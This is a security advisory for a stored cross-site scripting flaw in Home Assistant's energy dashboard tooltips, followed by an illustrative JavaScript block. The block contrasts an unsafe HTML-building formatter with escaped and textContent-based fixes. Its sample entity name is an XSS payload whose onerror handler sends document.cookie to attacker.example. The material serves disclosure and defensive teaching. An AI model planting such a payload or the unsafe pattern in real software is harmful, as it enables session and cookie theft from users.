PT-2025-41968 · Unknown · Home Assistant

Published: 2025-10-14 · Updated: 2025-10-16 · CVE-2025-62172

CVSS v4.0: 9.3 (Critical)

Vector: AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Name of the Vulnerable Software and Affected Versions: Home Assistant versions 2025.1.0 through 2025.10.1

Description: Home Assistant is home automation software that prioritizes local control and privacy. The energy dashboard is susceptible to stored cross-site scripting. An authenticated user can inject malicious JavaScript into an energy entity's name field; the payload then executes whenever any user hovers over a data point in an energy dashboard graph, because the tooltip is built from the entity name without escaping HTML. This allows an authenticated attacker to run arbitrary JavaScript in the context of other users' sessions. If an energy provider supplies a malicious default name for an entity, the issue can be triggered without anyone having edited the name, as long as that default name is kept.

Recommendations: Update to Home Assistant version 2025.10.2 or later.
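The vulnerability class described above, as an added illustration that is not Home Assistant's code: a tooltip formatter that interpolates an entity name into an HTML string (the vulnerable pattern), the same formatter with output encoding, a DOM-based variant that uses `textContent`, and a small check that lists which tags an HTML string actually opens. The entity object, function names and markup shape are assumptions made for this example, and the sample entity name is a constructed payload.

```javascript
// Added example, not Home Assistant's code. The entity shape, the function
// names and the tooltip markup are assumptions for illustration only.

// Constructed sample: an energy entity whose friendly name carries an inline
// event handler. In the bug described above such a name is reached either by a
// user editing the name field or by a provider shipping it as the default name.
const SAMPLE_ENTITY = {
  entity_id: "sensor.solar_production",
  name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  value: 3.2,
  unit: "kWh",
};

// Vulnerable pattern: the untrusted name is concatenated straight into an HTML
// string that the chart later assigns to innerHTML, so any tag in the name
// becomes live DOM and its handler runs in the hovering user's session.
function renderTooltipUnsafe(entity) {
  return `<div class="tooltip"><b>${entity.name}</b>: ${entity.value} ${entity.unit}</div>`;
}

// HTML entity encoding for text nodes and double- or single-quoted attributes.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern 1: keep the string-building formatter but encode every
// untrusted value at the point where it is interpolated into markup.
function renderTooltipSafe(entity) {
  return `<div class="tooltip"><b>${escapeHtml(entity.name)}</b>: ` +
    `${escapeHtml(entity.value)} ${escapeHtml(entity.unit)}</div>`;
}

// Hardened pattern 2 (preferred in a browser): build DOM nodes and assign the
// name with textContent, so the parser never sees it as markup. `doc` is a
// parameter so the function can be exercised outside a browser; in the page it
// is simply `document`.
function buildTooltipNode(entity, doc = document) {
  const wrap = doc.createElement("div");
  wrap.className = "tooltip";
  const label = doc.createElement("b");
  label.textContent = entity.name;
  wrap.appendChild(label);
  wrap.appendChild(doc.createTextNode(`: ${entity.value} ${entity.unit}`));
  return wrap;
}

// Reviewer check: which element tags does this HTML string actually open?
// The template itself only opens <div> and <b>; anything else came from data.
function openedTags(html) {
  return Array.from(html.matchAll(/<([a-z][a-z0-9]*)/gi), (m) => m[1].toLowerCase());
}
```

Note that `escapeHtml` leaves the literal text `onerror=` in the output; that is correct, because the encoded `&lt;img` is no longer a tag, so the attribute is inert. This is also why the fix belongs at the rendering layer rather than in name validation: a provider-supplied default name never passes through the user-facing name field, so input filtering alone would not cover the second path the advisory describes.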

Exploit · Fix · XSS

Weakness Enumeration

Related Identifiers

CVE-2025-62172
GHSA-MQ77-RV97-285M

Affected Products

Home Assistant